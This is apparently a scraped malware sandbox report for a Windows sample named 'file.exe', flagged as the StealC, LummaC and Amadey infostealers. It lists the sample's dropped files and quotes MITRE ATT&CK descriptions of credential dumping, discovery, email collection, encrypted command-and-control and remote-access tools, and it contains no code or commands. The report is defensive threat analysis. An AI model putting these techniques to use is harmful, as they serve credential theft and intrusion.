Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBAEHCAEGDHJKFHJKFIJ

C:\ProgramData\CFIEHCFIECBGCBFHIJJKEGHIEC

C:\ProgramData\FBKEHJEGCFBFHJJKJEHDHIDBKK

C:\ProgramData\HCAFIJDGHCBFHJKFCGIE

C:\ProgramData\HIEHDHCF

C:\ProgramData\JJDGIIDHJEBGIDHJJDBK

Windows Analysis Report
file.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre